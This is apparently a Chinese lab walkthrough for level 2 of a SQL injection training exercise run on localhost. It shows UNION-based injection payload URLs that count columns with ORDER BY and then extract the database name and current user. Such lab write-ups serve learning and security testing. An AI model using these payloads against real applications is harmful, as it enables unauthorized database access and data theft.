进入第二关,有了less-1的基础后,我们直接开始提交参数。判断是否有注入点。
测一下id可以观察到报错信息可以看出来是数字型id,且没有任何包裹
使用order by http://localhost/sqli/Less-2/?id=1 order by 1%23 数字变化后可以试出字段
联合查询字段 http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23 用报错方式来显示可以看出
可以看到有返回值出现 查询数据库名和用户 http://localhost/sqli/Less-2/?id=-1 union select 1,database(),user()%23